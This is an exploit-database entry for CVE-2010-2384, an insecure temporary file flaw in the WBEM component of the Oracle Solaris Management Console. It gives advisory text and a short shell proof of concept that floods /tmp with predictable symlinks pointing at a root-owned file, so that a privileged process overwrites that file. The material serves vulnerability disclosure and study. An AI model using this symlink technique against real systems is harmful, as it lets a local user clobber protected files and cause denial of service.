EXPLOITS

Oracle Solaris Management Console - WBEM Insecure Temporary File Creation

Author: Frank Stuart
type: local
platform: solaris
port: 
date_added: 2010-07-13  
date_updated: 2014-08-11  
verified: 1  
codes: CVE-2010-2384;OSVDB-66368  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 34314.sh  

source: https://www.securityfocus.com/bid/41642/info

The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.

An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.

Solaris 9 and 10 are affected.

   $ id
   uid=101(fstuart) gid=14(sysadmin)
   $ cd /tmp
   $ x=0
   $ while [ "$x" -ne 30000 ] ;do
   > ln -s /etc/important /tmp/dummy.$x
   > x=$(expr "$x" + 1)
   > done
   $ ls -dl /etc/important
   -rw-r--r--   1 root     root          38 Jan  3 22:43 /etc/important
   $ cat /etc/important
      This is an important file!

      EOF